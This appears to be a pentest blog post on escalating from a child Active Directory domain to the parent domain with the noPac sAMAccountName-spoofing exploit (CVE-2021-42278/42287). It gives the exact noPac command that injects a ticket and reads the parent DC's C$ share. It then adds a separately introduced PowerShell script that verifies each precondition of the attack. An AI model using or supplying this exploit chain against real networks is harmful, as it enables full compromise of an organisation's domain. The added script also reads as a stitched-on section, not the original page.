sAMAccountName Spoofing in the Forest

Exploiting sAMAccountName spoofing (CVE-2021-42278 & CVE-2021-42287) from the child domain can lead to compromise of the parent domain

Last updated 1 year ago

Description

The parent domain can be compromised from a user account in the child domain using noPac.exe, the sAMAccountName spoofing exploit written by cube0x0. I noticed that he did not include an example command for compromising the parent domain, so the parameters that make it work are documented here.

Forest Information

unsafe.local = parent domain

gotham.unsafe.local = child domain

user1 = user of the gotham domain

In the above scenario, set the -dc parameter to a domain controller of the parent domain and do not specify the -domain parameter. If you pass the parent domain name together with the credentials of a child-domain user, the NetworkCredential class returns an invalid credentials error.

If you specify the child domain name instead, the exploit adds the machine account to gotham.unsafe.local, which defeats the objective. So NetworkCredential.argDomain must stay empty: the username and password alone are enough to authenticate to the parent DC, because the child-to-parent trust resolves the account. This can be seen where the credential is built at line 399 of noPac.

The domain name needed to add the machine account is extracted from the specified DC name instead (line 421).

Commands
# Run from a host joined to the child domain as the child user.
# -dc is a parent-domain DC; -domain is deliberately omitted (see above).
noPac.exe -user [child-user] -pass [pass] -dc [parent-dc] -mAccount [machine-name] -mPassword [machine-pass] -service cifs -ptt
# With the CIFS ticket for the parent DC injected (-ptt), read its C$ share.
dir \\parent-dc\c$
# Author: Metin Yunus Kandemir
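As an added example (not part of cube0x0's noPac and not from the original page), the following PowerShell pre-flight script reproduces the authentication behaviour explained above before noPac is launched: it derives the target domain from the DC name, shows that the child user's credentials fail against the parent DC when the parent domain name is set but succeed with an empty domain, and then checks the two things the machine-account step depends on in the parent domain. It is meant to run from a host joined to gotham.unsafe.local as user1. The parent DC name dc01.unsafe.local, the password, the use of the first DNS label as the DC's hostname, and the ms-DS-MachineAccountQuota check are assumptions; only the forest names and user1 come from the page.

```powershell
# Added example, not part of noPac. Pre-flight checks for the child -> parent
# scenario on this page. Assumed placeholders: dc01.unsafe.local, the password.
param(
    [string]$ParentDc  = 'dc01.unsafe.local',   # the value you will pass to noPac -dc
    [string]$ChildUser = 'user1',                # user in gotham.unsafe.local
    [string]$Password  = 'ChangeMe123!'          # placeholder
)

Add-Type -AssemblyName System.DirectoryServices.Protocols

function Connect-Ldap {
    # Bind to $Server with $Cred; the Domain property of $Cred plays the role
    # of noPac's -domain argument. Returns the bound connection or $null.
    param([string]$Server, [System.Net.NetworkCredential]$Cred)
    $id   = New-Object System.DirectoryServices.Protocols.LdapDirectoryIdentifier($Server, 389)
    $conn = New-Object System.DirectoryServices.Protocols.LdapConnection($id, $Cred, [System.DirectoryServices.Protocols.AuthType]::Negotiate)
    $conn.SessionOptions.Signing = $true   # sign/seal so a DC enforcing LDAP signing accepts the bind
    $conn.SessionOptions.Sealing = $true
    try   { $conn.Bind(); return $conn }
    catch {
        Write-Warning "bind as '$($Cred.Domain)\$($Cred.UserName)' failed: $($_.Exception.Message)"
        $conn.Dispose(); return $null
    }
}

function Get-SingleAttr {
    # Read one attribute of the first entry matching $Filter under $Base.
    param($Conn, [string]$Base, [string]$Filter, [string]$Attr,
          [System.DirectoryServices.Protocols.SearchScope]$Scope = 'Base')
    $req  = New-Object System.DirectoryServices.Protocols.SearchRequest($Base, $Filter, $Scope, [string[]]@($Attr))
    $resp = $Conn.SendRequest($req)
    if ($resp.Entries.Count -eq 0) { return $null }
    $a = $resp.Entries[0].Attributes[$Attr]
    if ($null -eq $a) { return $null }
    return [string]$a.GetValues([string])[0]
}

# 1. noPac takes the domain for the new machine account from the DC name, so
#    the DNS suffix of -dc must be the parent, not the child.
$ParentDomain = $ParentDc.Substring($ParentDc.IndexOf('.') + 1)
"Domain derived from -dc: $ParentDomain"

# 2. Child credentials with the parent domain name filled in: expected to fail.
#    This is the 'invalid credentials' case that makes -domain unusable here.
$bad = Connect-Ldap -Server $ParentDc -Cred (New-Object System.Net.NetworkCredential($ChildUser, $Password, $ParentDomain))
if ($bad) { "Unexpectedly bound with domain '$ParentDomain' set"; $bad.Dispose() }

# 3. Same username and password with an empty domain (NetworkCredential.Domain = ''):
#    the form noPac uses when -domain is omitted, resolved through the trust.
$conn = Connect-Ldap -Server $ParentDc -Cred (New-Object System.Net.NetworkCredential($ChildUser, $Password))
if (-not $conn) { throw "Cannot authenticate to $ParentDc as $ChildUser; noPac will fail the same way." }

# 4. -mAccount creates a computer object in the parent; that needs a non-zero
#    ms-DS-MachineAccountQuota (default 10) for an unprivileged user.
$nc    = Get-SingleAttr $conn '' '(objectClass=*)' 'defaultNamingContext'
$quota = Get-SingleAttr $conn $nc '(objectClass=domain)' 'ms-DS-MachineAccountQuota'
"Parent naming context: $nc   ms-DS-MachineAccountQuota: $quota"
if ([int]$quota -le 0) { Write-Warning 'Quota is 0: machine account creation will be refused for this user.' }

# 5. The name noPac will give the new account is the parent DC's sAMAccountName
#    without the trailing '$'; confirm the DC object is visible to the child user.
$dcHost = $ParentDc.Split('.')[0]          # assumption: hostname is the first DNS label
$dcSam  = Get-SingleAttr $conn $nc "(&(objectClass=computer)(sAMAccountName=$dcHost`$))" 'sAMAccountName' -Scope Subtree
if ($dcSam) { "DC account: $dcSam  -> spoofed name will be $($dcSam.TrimEnd('$'))" }
else        { Write-Warning "No computer object named $dcHost`$ found under $nc; check the -dc value." }

$conn.Dispose()
```

If step 2 succeeds or step 3 fails, the trust or the host's domain membership is not what the page assumes and noPac will not behave as described; if step 4 reports a quota of 0, -mAccount will fail unless the child user already controls a computer account in the parent domain.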

Reference

https://github.com/cube0x0/noPac